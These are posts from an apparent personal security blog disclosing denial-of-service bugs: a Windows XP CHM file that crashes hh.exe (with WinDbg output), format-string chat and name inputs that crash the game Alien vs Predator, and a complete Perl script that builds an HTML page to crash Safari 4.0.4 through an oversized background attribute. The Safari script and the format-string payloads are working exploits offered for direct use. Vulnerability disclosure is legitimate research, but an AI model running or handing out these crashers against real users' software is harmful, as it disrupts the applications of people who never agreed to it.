NoBytes.com

WinXP Compiled Help File (CHM) DoS (hh.exe)

2011-08-22T14:28:00.009+01:00

Here's a PoC Windows XP 'Compiled Help File' (CHM) DoS which has been sitting on my hard disk for a while, tested working on fully patched WinXP SP3 32bit machine:

Crashing Executable: hh.exe
Version: 5.2.3790.2453

WinDbg result:

(ed8.edc): Stack overflow - code c00000fd (!!! second chance !!!) eax=00042968 ebx=000af0b0 ecx=00042964 edx=0007ebb0 esi=000af0b0 edi=0007ebe0 eip=65e3d633 esp=0007e95c ebp=0007ebb4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 itss!_chkstk+0x33: 65e3d633 8501 test dword ptr [ecx],eax ds:0023:00042964=00000000

!exploitable result:

Exploitability Classification: UNKNOWN Recommended Bug Title: Stack Overflow starting at itss!_chkstk+0x0000000000000033 (Hash=0x7c592e02.0x7a176714)

Download PoC Here

New 'Alien vs Predator' Format String Bugs

2010-02-27T00:15:00.009Z

Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.

Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven't got anybody to test on.

%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n

Setting your Name to: '%n' will stop you from ever joining a game, you just get an error reporting your unable to connect.
Setting your Name to '%i' will set your Name to random numbers which changes as you play.

I tried contacting Steam/Rebellion/Sega, but so far had no response.

New 0Day Safari 'background' DoS

2010-01-20T18:25:00.004Z

New 0Day Safari DoS I found last night.
Can somebody test to confirm its working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.

#!/usr/bin/perl # # Safari 4.0.4 (531.21.10) - Stack Overflow/run # 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0] # Tested on WinXP (32bit) SP3 # # Magic Numbers: # 114516 -> 114718 : Safari quits without error # 114719 : Safari quits with illegal operation: # AppName: safari.exe # AppVer: 5.31.21.10 # ModName: cfnetwork.dll # ModVer: 1.450.5.0 # Offset: 000567a7 $filename = $ARGV[0]; $buffer = $ARGV[1]; if(!defined($filename)) { print "Usage: $0 <filename.html> <buffer>\n\n"; } $header = "<html> <head>" . "\n"; $crash = "<body background = \"" . "A" x $buffer . "\">" . "\n"; $footer = "</html>" . "\n"; $data = $header . $crash . $footer; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit;